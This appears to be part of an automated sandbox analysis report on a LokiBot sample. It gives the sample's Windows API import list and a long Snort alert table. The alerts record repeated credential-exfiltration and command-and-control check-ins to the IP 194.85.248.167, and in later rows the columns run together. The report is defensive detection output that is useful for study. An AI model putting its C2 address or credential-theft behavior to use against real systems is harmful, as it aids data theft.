GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                  Possible Origin

Language of compilation system | Country where language is spoken
English | United States

                  Network Behavior

                  Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/25/21-18:22:15.658540 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49744 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:15.658540 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49744 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:15.658540 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49744 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:15.658540 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49744 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:18.837898 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49745 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:18.837898 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49745 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:18.837898 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49745 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:18.837898 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49745 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:21.772417 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49746 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:21.772417 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49746 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:21.772417 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49746 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:21.772417 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49746 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:21.949354 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49746 | 194.85.248.167 | 192.168.2.3
11/25/21-18:22:23.379975 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49747 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:23.379975 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49747 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:23.379975 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49747 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:23.379975 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49747 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:23.474404 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49747 | 194.85.248.167 | 192.168.2.3
11/25/21-18:22:25.292669 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49748 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:25.292669 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49748 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:25.292669 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49748 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:25.292669 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49748 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:25.843662 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49748 | 194.85.248.167 | 192.168.2.3
11/25/21-18:22:26.868772 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49749 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:26.868772 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49749 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:26.868772 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49749 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:26.868772 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49749 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:26.965338 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49749 | 194.85.248.167 | 192.168.2.3
11/25/21-18:22:28.257549 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49750 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:28.257549 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49750 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:28.257549 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49750 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:28.257549 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49750 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:28.383367 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49750 | 194.85.248.167 | 192.168.2.3
11/25/21-18:22:29.608133 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49751 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:29.608133 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49751 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:29.608133 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49751 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:29.608133 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49751 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:30.439113 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49751 | 194.85.248.167 | 192.168.2.3
11/25/21-18:22:31.618850 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49752 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:31.618850 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49752 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:31.618850 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49752 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:31.618850 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49752 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:32.376492 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49752 | 194.85.248.167 | 192.168.2.3
11/25/21-18:22:35.179306 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49755 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:35.179306 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49755 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:35.179306 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49755 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:35.179306 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49755 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:35.268660 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49755 | 194.85.248.167 | 192.168.2.3
11/25/21-18:22:37.775846 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49756 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:37.775846 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49756 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:37.775846 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49756 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:37.775846 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49756 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:39.011205 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49756 | 194.85.248.167 | 192.168.2.3
11/25/21-18:22:40.734394 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49757 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:40.734394 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49757 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:40.734394 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49757 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:40.734394 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49757 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:41.150241 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49757 | 194.85.248.167 | 192.168.2.3
11/25/21-18:22:44.172505 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49758 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:44.172505 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49758 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:44.172505 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49758 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:44.172505 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49758 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:44.258064 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49758 | 194.85.248.167 | 192.168.2.3
11/25/21-18:22:45.537822 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49759 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:45.537822 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49759 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:45.537822 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49759 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:45.537822 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49759 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:46.363115 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49759 | 194.85.248.167 | 192.168.2.3
11/25/21-18:22:47.475042 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49760 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:47.475042 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49760 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:47.475042 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49760 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:47.475042 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49760 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:47.564037 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49760 | 194.85.248.167 | 192.168.2.3
11/25/21-18:22:48.480656 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49761 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:48.480656 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49761 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:48.480656 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49761 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:48.480656 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49761 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:48.579071 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49761 | 194.85.248.167 | 192.168.2.3
11/25/21-18:22:51.071537 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49762 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:51.071537 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49762 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:51.071537 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49762 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:51.071537 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49762 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:51.163780 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49762 | 194.85.248.167 | 192.168.2.3
11/25/21-18:22:52.226443 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49763 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:52.226443 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49763 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:52.226443 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49763 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:52.226443 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49763 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:52.969004 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49763 | 194.85.248.167 | 192.168.2.3
11/25/21-18:22:54.348325 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49765 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:54.348325 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49765 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:54.348325 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49765 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:54.348325 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49765 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:54.655710 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49765 | 194.85.248.167 | 192.168.2.3
11/25/21-18:22:55.798213 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49766 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:55.798213 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49766 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:55.798213 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49766 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:55.798213 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49766 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:56.114465 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49766 | 194.85.248.167 | 192.168.2.3
11/25/21-18:22:58.836459 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49769 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:58.836459 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49769 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:58.836459 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49769 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:58.836459 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49769 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:22:59.163004 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49769 | 194.85.248.167 | 192.168.2.3
11/25/21-18:23:01.423938 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49770 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:23:01.423938 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49770 | 80 | 192.168.2.3 | 194.85.248.167
11/25/21-18:23:01.423938 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49770 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:23:01.423938TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.3194.85.248.167
                  11/25/21-18:23:02.684122TCP2025483ET TROJAN LokiBot Fake 404 Response8049770194.85.248.167192.168.2.3
                  11/25/21-18:23:07.452292TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.3194.85.248.167
                  11/25/21-18:23:07.452292TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.3194.85.248.167
                  11/25/21-18:23:07.452292TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.3194.85.248.167
                  11/25/21-18:23:07.452292TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978580192.168.2.3194.85.248.167
                  11/25/21-18:23:07.544955TCP2025483ET TROJAN LokiBot Fake 404 Response8049785194.85.248.167192.168.2.3
                  11/25/21-18:23:09.396769TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980980192.168.2.3194.85.248.167
                  11/25/21-18:23:09.396769TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980980192.168.2.3194.85.248.167
                  11/25/21-18:23:09.396769TCP2025381ET TROJAN LokiBot Checkin4980980192.168.2.3194.85.248.167
                  11/25/21-18:23:09.396769TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980980192.168.2.3194.85.248.167
                  11/25/21-18:23:09.919206TCP2025483ET TROJAN LokiBot Fake 404 Response8049809194.85.248.167192.168.2.3
                  11/25/21-18:23:13.834390TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.3194.85.248.167
                  11/25/21-18:23:13.834390TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.3194.85.248.167
                  11/25/21-18:23:13.834390TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.3194.85.248.167
                  11/25/21-18:23:13.834390TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981380192.168.2.3194.85.248.167
                  11/25/21-18:23:13.931422TCP2025483ET TROJAN LokiBot Fake 404 Response8049813194.85.248.167192.168.2.3
                  11/25/21-18:23:19.463239TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.3194.85.248.167
                  11/25/21-18:23:19.463239TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.3194.85.248.167
                  11/25/21-18:23:19.463239TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.3194.85.248.167
                  11/25/21-18:23:19.463239TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981480192.168.2.3194.85.248.167
                  11/25/21-18:23:20.086960TCP2025483ET TROJAN LokiBot Fake 404 Response8049814194.85.248.167192.168.2.3
                  11/25/21-18:23:23.655365TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.3194.85.248.167
                  11/25/21-18:23:23.655365TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.3194.85.248.167
                  11/25/21-18:23:23.655365TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.3194.85.248.167
                  11/25/21-18:23:23.655365TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981780192.168.2.3194.85.248.167
                  11/25/21-18:23:24.492060TCP2025483ET TROJAN LokiBot Fake 404 Response8049817194.85.248.167192.168.2.3
                  11/25/21-18:23:26.318058TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.3194.85.248.167
                  11/25/21-18:23:26.318058TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.3194.85.248.167
                  11/25/21-18:23:26.318058TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.3194.85.248.167
                  11/25/21-18:23:26.318058TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981880192.168.2.3194.85.248.167
                  11/25/21-18:23:26.435048TCP2025483ET TROJAN LokiBot Fake 404 Response8049818194.85.248.167192.168.2.3
                  11/25/21-18:23:27.828008TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.2.3194.85.248.167
                  11/25/21-18:23:27.828008TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.2.3194.85.248.167
                  11/25/21-18:23:27.828008TCP2025381ET TROJAN LokiBot Checkin4981980192.168.2.3194.85.248.167
                  11/25/21-18:23:27.828008TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981980192.168.2.3194.85.248.167
                  11/25/21-18:23:27.923948TCP2025483ET TROJAN LokiBot Fake 404 Response8049819194.85.248.167192.168.2.3
                  11/25/21-18:23:29.237002TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.3194.85.248.167
                  11/25/21-18:23:29.237002TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.3194.85.248.167
                  11/25/21-18:23:29.237002TCP2025381ET TROJAN LokiBot Checkin4982080192.168.2.3194.85.248.167
                  11/25/21-18:23:29.237002TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982080192.168.2.3194.85.248.167
                  11/25/21-18:23:29.329433TCP2025483ET TROJAN LokiBot Fake 404 Response8049820194.85.248.167192.168.2.3
                  11/25/21-18:23:30.587831TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.3194.85.248.167
                  11/25/21-18:23:30.587831TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.3194.85.248.167
                  11/25/21-18:23:30.587831TCP2025381ET TROJAN LokiBot Checkin4982180192.168.2.3194.85.248.167
                  11/25/21-18:23:30.587831TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982180192.168.2.3194.85.248.167
                  11/25/21-18:23:30.896799TCP2025483ET TROJAN LokiBot Fake 404 Response8049821194.85.248.167192.168.2.3
                  11/25/21-18:23:32.864603TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.2.3194.85.248.167
                  11/25/21-18:23:32.864603TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.2.3194.85.248.167
                  11/25/21-18:23:32.864603TCP2025381ET TROJAN LokiBot Checkin4982280192.168.2.3194.85.248.167
                  11/25/21-18:23:32.864603TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982280192.168.2.3194.85.248.167
                  11/25/21-18:23:32.960193TCP2025483ET TROJAN LokiBot Fake 404 Response8049822194.85.248.167192.168.2.3
                  11/25/21-18:23:35.140691TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.3194.85.248.167
                  11/25/21-18:23:35.140691TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.3194.85.248.167
                  11/25/21-18:23:35.140691TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.3194.85.248.167
                  11/25/21-18:23:35.140691TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982380192.168.2.3194.85.248.167
                  11/25/21-18:23:35.375536TCP2025483ET TROJAN LokiBot Fake 404 Response8049823194.85.248.167192.168.2.3
                  11/25/21-18:23:36.493113TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.2.3194.85.248.167
                  11/25/21-18:23:36.493113TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.2.3194.85.248.167
                  11/25/21-18:23:36.493113TCP2025381ET TROJAN LokiBot Checkin4982580192.168.2.3194.85.248.167
                  11/25/21-18:23:36.493113TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982580192.168.2.3194.85.248.167
                  11/25/21-18:23:37.014189TCP2025483ET TROJAN LokiBot Fake 404 Response8049825194.85.248.167192.168.2.3
                  11/25/21-18:23:40.295826TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982780192.168.2.3194.85.248.167
                  11/25/21-18:23:40.295826TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982780192.168.2.3194.85.248.167
                  11/25/21-18:23:40.295826TCP2025381ET TROJAN LokiBot Checkin4982780192.168.2.3194.85.248.167
                  11/25/21-18:23:40.295826TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982780192.168.2.3194.85.248.167
                  11/25/21-18:23:40.387692TCP2025483ET TROJAN LokiBot Fake 404 Response8049827194.85.248.167192.168.2.3
                  11/25/21-18:23:41.914761TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982980192.168.2.3194.85.248.167
                  11/25/21-18:23:41.914761TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982980192.168.2.3194.85.248.167
                  11/25/21-18:23:41.914761TCP2025381ET TROJAN LokiBot Checkin4982980192.168.2.3194.85.248.167
                  11/25/21-18:23:41.914761TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982980192.168.2.3194.85.248.167
                  11/25/21-18:23:42.233618TCP2025483ET TROJAN LokiBot Fake 404 Response8049829194.85.248.167192.168.2.3
                  11/25/21-18:23:44.612994TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983380192.168.2.3194.85.248.167
                  11/25/21-18:23:44.612994TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983380192.168.2.3194.85.248.167
                  11/25/21-18:23:44.612994TCP2025381ET TROJAN LokiBot Checkin4983380192.168.2.3194.85.248.167
                  11/25/21-18:23:44.612994TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983380192.168.2.3194.85.248.167
                  11/25/21-18:23:44.707285TCP2025483ET TROJAN LokiBot Fake 404 Response8049833194.85.248.167192.168.2.3
                  11/25/21-18:23:45.744734TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.3194.85.248.167
                  11/25/21-18:23:45.744734TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.3194.85.248.167
                  11/25/21-18:23:45.744734TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.3194.85.248.167
                  11/25/21-18:23:45.744734TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984580192.168.2.3194.85.248.167
                  11/25/21-18:23:45.839464TCP2025483ET TROJAN LokiBot Fake 404 Response8049845194.85.248.167192.168.2.3
                  11/25/21-18:23:46.879979TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.2.3194.85.248.167
                  11/25/21-18:23:46.879979TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.2.3194.85.248.167
                  11/25/21-18:23:46.879979TCP2025381ET TROJAN LokiBot Checkin4985180192.168.2.3194.85.248.167
                  11/25/21-18:23:46.879979TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985180192.168.2.3194.85.248.167
                  11/25/21-18:23:47.403833TCP2025483ET TROJAN LokiBot Fake 404 Response8049851194.85.248.167192.168.2.3
                  11/25/21-18:23:48.864530TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.2.3194.85.248.167
                  11/25/21-18:23:48.864530TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.2.3194.85.248.167
                  11/25/21-18:23:48.864530TCP2025381ET TROJAN LokiBot Checkin4985580192.168.2.3194.85.248.167
                  11/25/21-18:23:48.864530TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985580192.168.2.3194.85.248.167
                  11/25/21-18:23:48.959683TCP2025483ET TROJAN LokiBot Fake 404 Response8049855194.85.248.167192.168.2.3
                  11/25/21-18:23:51.197910TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.2.3194.85.248.167
                  11/25/21-18:23:51.197910TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.2.3194.85.248.167
                  11/25/21-18:23:51.197910TCP2025381ET TROJAN LokiBot Checkin4985680192.168.2.3194.85.248.167
                  11/25/21-18:23:51.197910TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985680192.168.2.3194.85.248.167
                  11/25/21-18:23:53.573219TCP2025483ET TROJAN LokiBot Fake 404 Response8049856194.85.248.167192.168.2.3
                  11/25/21-18:23:55.025972TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.2.3194.85.248.167
